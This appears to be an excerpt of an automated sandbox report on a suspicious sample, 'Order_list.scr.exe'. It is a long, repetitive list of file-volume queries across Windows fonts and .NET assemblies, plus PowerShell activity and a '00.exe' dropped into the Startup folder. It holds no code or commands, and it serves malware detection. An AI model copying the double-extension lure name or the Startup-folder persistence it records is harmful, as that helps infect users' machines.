Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Users\user\Desktop\Order_list.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
